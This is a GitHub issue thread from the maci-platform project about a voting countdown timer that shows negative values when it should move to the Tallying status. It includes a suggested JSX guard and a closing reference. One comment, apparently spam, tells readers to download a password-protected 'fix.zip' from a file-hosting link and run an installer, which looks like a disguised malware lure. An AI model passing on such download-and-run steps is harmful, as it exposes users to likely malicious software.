### ISSUE TITLE
Bug(interface): prevent negative countdown timer

### ISSUE THREAD

**Issue by kittybest** [privacy-scaling-explorations/maci-platform#284]
**Description**
When voting period is over the timer is negative, should move to the next period --> check why it's not moving to the `Tallying` status.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ctrlc03** [comment]
@kittybest maybe here https://github.com/privacy-scaling-explorations/maci-platform/blob/main/packages/interface/src/components/VotingInfo.tsx#L21-L23 we need to add 

      {!isLoading && timeLeft[3] < 0 && <p>Voting has ended</p>}
 ?

**Comment by kittybest** [comment]
> @kittybest maybe here https://github.com/privacy-scaling-explorations/maci-platform/blob/main/packages/interface/src/components/VotingInfo.tsx#L21-L23 we need to add
> 
> ```
>   {!isLoading && timeLeft[3] < 0 && <p>Voting has ended</p>}
> ```
> 
> ?

I'm just thinking about if the timeLeft < 0, the state should be moved to Tally? So actually this shouldn't happen. But it's a efficient way to prevent negative timer displayed.

**Comment by kittybest** [comment]
close by #290
